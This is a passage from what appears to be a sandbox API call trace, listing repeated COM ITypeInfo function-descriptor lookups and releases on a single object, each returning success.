ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x80, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x81, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x82, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x83, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x84, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x85, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x86, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x87, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x88, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x89, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8a, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8b, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8c, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8d, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8e, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.315] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8f, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.315] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x90, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x91, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x92, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x93, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x94, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x95, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x96, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x97, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x98, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x99, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9a, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9b, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9c, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9d, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9e, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9f, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa0, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa1, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa2, ppFuncDesc=0x186438, pDummy=0x140 | out: ppFuncDesc=0x186438, pDummy=0x140) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa3, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa4, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.316] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.316] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa5, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa6, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa7, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa8, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa9, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xaa, ppFuncDesc=0x186438, pDummy=0x140 | out: ppFuncDesc=0x186438, pDummy=0x140) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xab, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xac, ppFuncDesc=0x186438, pDummy=0x140 | out: ppFuncDesc=0x186438, pDummy=0x140) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xad, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xae, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xaf, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb0, ppFuncDesc=0x186438, pDummy=0x140 | out: ppFuncDesc=0x186438, pDummy=0x140) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb1, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb2, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb3, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb4, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb5, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb6, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb7, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb8, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb9, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.317] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.317] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xba, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbb, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbc, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbd, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbe, ppFuncDesc=0x186438, pDummy=0x140 | out: ppFuncDesc=0x186438, pDummy=0x140) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xbf, ppFuncDesc=0x186438, pDummy=0x140 | out: ppFuncDesc=0x186438, pDummy=0x140) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc0, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc1, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc2, ppFuncDesc=0x186438, pDummy=0x140 | out: ppFuncDesc=0x186438, pDummy=0x140) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc3, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc4, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc5, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc6, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc7, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc8, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc9, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xca, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcb, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcc, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcd, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xce, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.318] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xcf, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.318] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd0, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd1, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd2, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd3, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd4, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd5, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd6, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd7, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd8, ppFuncDesc=0x186438, pDummy=0x140 | out: ppFuncDesc=0x186438, pDummy=0x140) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd9, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xda, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdb, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdc, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdd, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xde, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xdf, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.319] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe0, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.319] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe1, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe2, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe3, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe4, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe5, ppFuncDesc=0x186438, pDummy=0xf0 | out: ppFuncDesc=0x186438, pDummy=0xf0) returned 0x0 [0041.320] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.320] 